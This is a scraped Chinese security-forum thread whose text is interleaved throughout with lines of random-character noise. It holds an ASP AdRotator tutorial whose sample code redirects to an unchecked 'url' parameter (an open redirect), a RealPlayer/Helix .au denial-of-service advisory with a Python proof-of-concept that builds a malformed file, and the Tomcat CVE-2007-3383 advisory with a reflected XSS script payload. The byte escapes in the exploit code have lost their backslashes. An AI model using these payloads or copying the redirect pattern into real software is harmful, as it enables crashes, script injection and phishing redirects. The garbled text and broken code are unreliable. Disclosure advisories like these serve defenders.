# D# Z5 p' ?. ?0 l$ x5 Z7 }8 y( n7 Q9 Z0 k/ d6 h) N

7 K8 R, b; R8 U4 m( }# m4 r$ M
( c+ X3 f$ i* Z/ R, N
! r# U5 h; B/ v
; c' I5 _. n! ?. E- c+ M0 l& i& _  m0 k9 q( Y5 v3 u
+ T  r6 z7 i, ^  v' |5 U6 l4 N5 ]
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

ASP基础教程AdRotator组件的使用
ASP AdRotator 组件
/ U  a' V: P: p! L; F2 e8 `8 ?
每当用户进入网站或刷新页面时,ASP AdRotator组件就会创建一个AdRotator对象来显示一幅不同的图片。
$ y& O$ p* m4 X1 p3 \0 [

2 m& f4 x/ r% B/ D5 h$ E# I1 S
语法:  

8 b/ c9 I; ?$ [$ k
以下为引用的内容:<%set adrotator=server.createobject("MSWC.AdRotator")adrotator.GetAdvertisement("textfile.txt")%>  
- ], ?" Q5 |8 x  V5 w3 Y) y
实例  

* G% U$ ^& u5 p) j+ Q) t
假设我们有一个文件名为"banners.asp"。它类似于这样:  
! a, U4 K* j. S# Q5 t
以下为引用的内容:<html%><body%><%set adrotator=Server.CreateObject("MSWC.AdRotator")response.write(adrotator.GetAdvertisement("ads.txt"))%></body%></html%> Www_
4 [2 d; O! i) Y. v0 T0 ^# Q
文件"ads.txt"类似这样:  
- L4 `) `4 ]5 }" t' }' D
以下为引用的内容:*webjxcom.gifhttp://www.webjx.com/Visit Webjx.Com80microsoft.gifhttp://www.microsoft.com/Visit Microsoft20   

0 k% `0 c+ u5 ?4 t# g

! s9 U6 W5 q8 U: c3 i& U
"ads.txt"文件中星号下面的代码定义了如何显示这些图像,链接地址,图像的替换文本,在每百次点击中的现实几率。我们可以看到,W3School图片的显示几率是80%,而Microsoft图片的显示几率是20%。  

6 D* a0 g9 l* h9 e8 c6 V
注释:为了使这些链接在用户点击时可以正常工作,我们需要对文件"ads.txt"进行一点点小小的修改:
- H1 r" D0 Y& Q

3 V# A9 ]" {( {, B0 z
以下为引用的内容:REDIRECT banners.asp*webjxcom.gifhttp://www.webjx.com/Visit Webjx.Com80microsoft.gifhttp://www.microsoft.com/Visit Microsoft20  

3 O) y0 x  d- J' t1 r, f
转向页面会接收到名为url的变量的查询字符串,其中含有供转向的URL。
  Y6 Z% {' v# }7 M& r4 ]% L
Chinaz.com
, I9 l2 K/ j5 r8 l
注释:如需规定图像的高度、宽度和边框,我们可以在REDIRECT下面插入这些代码:
5 r2 @, d# ?) Y" q- y9 [0 ?

- _  V! U% A3 X+ T0 X4 d
以下为引用的内容:REDIRECT banners.aspWIDTH 468 HEIGHT 60 BORDER 0 *webjxcom.gif...... Www^

0 G. [+ m* V  f, _! B7 B
最后要做的是把这些代码加入文件"banners.asp"中:

5 e- V2 X2 s9 \" q) x, C: t9 O0 ^
以下为引用的内容:
% l0 y( Y6 T: t$ @- ^
<%url=Request.QueryString("url")If url<>"" then Response.Redirect(url)%><html><body><%set adrotator=Server.CreateObject("MSWC.AdRotator")response.write(adrotator.GetAdvertisement("textfile.txt"))%></body></html>  
6 q. V8 q0 z4 z0 a" z8 n! w
) _, z* m/ _: \- ?6 s* q
8 q8 q$ ]) {2 f2 r

8 a3 m  u+ a8 [) Q
" z1 p: {! P# c: c) G& O
) w7 g% K8 u" X+ F6 ~# u1 |+ i5 U
  D% M. h1 |* G) x+ |$ E) Q3 t. z- `/ O' ?) k, X! Z
0 _: g3 z2 c4 l+ [

9 J  V  E* N+ ]' O# Q6 _
4 o& {; q# J, v2 q6 B0 y
/ V$ M+ `) \$ B6 U6 n4 R" X' ?% z$ T- I: T& W

# {8 ?- q& _" P5 C. o: M% v2 ~7 R, A5 U9 y- z

1 q* ^. U5 [* x/ m8 {% Y# _7 A( |( t6 M# ]$ d

/ M5 s4 F# u2 O1 O
7 V. L- x- S  C  A& \1 [* D+ [2 I0 z! E/ A5 ~
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

RealPlayerHelixPlayer AU除零错误拒绝服务漏洞
<TABLE class="tab-content table-break" cellSpacing=0 cellPadding=0>
/ q8 }. R) h. }6 a. v' C- |  }7 V. w, y& j, `
: l( E4 N: Y/ Q; z% O, I6 ^5 l

" \1 p* S/ o, @7 \影响版本: Real Networks RealPlayer 10 for Linux 10.1 Real Networks RealPlayer 10 for Linux 10.0.9 Real Networks RealPlayer 10 for Linux 10.0.8 Real Networks RealPlayer 10.5-GOLD Real Networks Helix Player for Linux 1.0.6
' l/ o9 [0 j% o! M: z" `; V% s4 P* ~$ V' ^0 N. x/ Z( Y7 x( P/ H# \

' N& u/ {* [& `影响版本: Real Networks RealPlayer 10 for Linux 10.1 Real Networks RealPlayer 10 for Linux 10.0.9 Real Networks RealPlayer 10 for Linux 10.0.8 Real Networks RealPlayer 10.5-GOLD Real Networks Helix Player for Linux 1.0.6   详细说明: RealPlayer/HelixPlayer是一款流行的媒体播放程序。 RealPlayer/HelixPlayer处理畸形.au文件存在问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 当用户打开特殊构建的.au文件时,可导致由于除零错误而使应用程序崩溃。 参考: http://archives.neohapsis.com/archives/fulldisclosure/2007-09/att-0154/OS2A_1010.txt 解决方案: 目前没有解决方案提供: http://www.real.com/ 测试方法: [警 告] 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负! import sys import os head = ("x2Ex73x6Ex64x00x00x01x18x02x01x42xDCx00x00x00x01"+         "x02x02x1Fx40x00x00x00x00x00" +         "x31x00x00x00x01x02x00x00x00x00x00x00x00x00x00x00"+         "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+         "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+         "x00x00x00x00x00x00x00x00x66x66x66x00") print "[x] RealPlayer/Helix Player/Kaboodle Player DoS" try:    f = open("exploit.au",’w’) except IOError, e:     print "Unable to open file ", e     sys.exit(0) print "[x] File successfully opened for writing." try:    f.write(head) except IOError, e:     print "Unable to write to file ", e     sys.exit(0) print "[x] File successfully written." f.close() print "[x] Open exploit.au with RealPlayer/Helix/Kaboodle Players." #End of program</TABLE>
) F2 b- ^/ ]; o. K- e) C2 H9 l( N' o
( Y4 @/ I6 @8 J4 g0 ~9 k
7 U6 K9 R6 k7 f! B* L) i' ^; ?  B

& s3 ~6 h* G1 _5 T, V) t& O9 P. w" ^# A  z

& L# G7 v2 ]- t# ?9 p' ]( K- Y* n0 M) v- L! Y

* M" Z7 g; O0 `  M7 v) r$ D( B- Q8 ^3 T
; H  e/ y: A7 [- {. E( F0 v, V5 P) O, r

9 F3 c) W7 b- F0 g! f, b
) u/ x( _, N$ O7 z$ ?3 E/ i
6 F4 v4 ?0 I; d8 f: [
& M7 P1 Y  w- ?! S( g5 D2 N) |# U. |0 r2 W0 N! h
* o# H# u4 n9 H4 G
) H# N% M7 {& y, ]5 U# `! W- @) h" J7 |
9 ]1 H" e) F8 t, A
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

XSS in Tomcat send mail[XSS于邮件发送攻击的例子]
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 cellPadding=0 width="100%" border=0>* i: j8 G8 R4 e# R# x. Q
$ @  }% m% H) Y

7 R  s& @2 r  i6 T' y4 e9 t- v' H+ gAffected Software :
" N  X1 p7 [6 T* r$ bApache, Tomcat, 4.0.0 Apache, Tomcat, 4.0.1 Apache, Tomcat, 4.0.2 Apache, Tomcat, 4.0.3 Apache, Tomcat, 4.0.4 Apache, Tomcat, 4.0.5 Apache, Tomcat, 4.0.6 Apache, Tomcat, 4.1.0 Apache, Tomcat, 4.1.1 Apache, Tomcat, 4.1.10 Apache, Tomcat, 4.1.15 Apache, Tomcat, 4.1.2 Apache, Tomcat, 4.1.24 Apache, Tomcat, 4.1.28 Apache, Tomcat, 4.1.3 Apache, Tomcat, 4.1.31 Apache, Tomcat, 4.1.36 </TABLE>  W' O: c' {+ M+ M
Advisory Text :  CVE-2007-3383: XSS in Tomcat send mail exampleSeverity:Low (Cross-site scripting)Vendor:The Apache Software FoundationVersions Affected:4.0.0 to 4.0.64.1.0 to 4.1.36Description:When reporting error messages, the SendMailServlet does notfilteruser supplied data before display. This enables an XSS attack.Mitigation:Undeploy the examples web application.Credit:This issue was discovered by Tomasz Kuczynski, PoznanSupercomputingand Networking Center, who worked with the CERT/CC to report thevulnerability.Example:On this pagehttp://localhost:8080/examples/jsp/mail/sendmail.jspenter the following text<script>alert('XSS reflected')</script>in the From field and click Send.References:http://tomcat.apache.org/security.htmlMark Thomas
0 r1 H( k( ]# m' R( I. b  v9 k+ ?/ P; z
. j! S9 Z& o/ S$ B$ u% i

4 l; V; z4 y0 @% E9 B
1 S2 F+ W: L' ?( R/ i& m9 [' m, {( F8 ~
% i9 P5 T7 F+ x+ G& y

- ?: w5 w% d* b* i! {2 |; a$ w  [* S4 ~4 i/ c) B2 p. l+ y0 r" @
" Q( N  i2 I* P2 Z0 v, K7 g
& [# d+ m" [3 D9 n* ~
+ k( _- ?) Z, A% m' f5 ~, Q

# \/ a7 a* n, k8 s' J$ N
& v8 x3 l. S. e3 s  Z; A0 w. a5 I/ e+ J0 O
  x. _- ?  I3 o1 h" l3 M1 Q

6 D3 R0 V+ k' E3 c5 _3 Z% E9 o/ S* r7 W; `6 l  `0 [9 N
3 k. T- o8 d( m
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表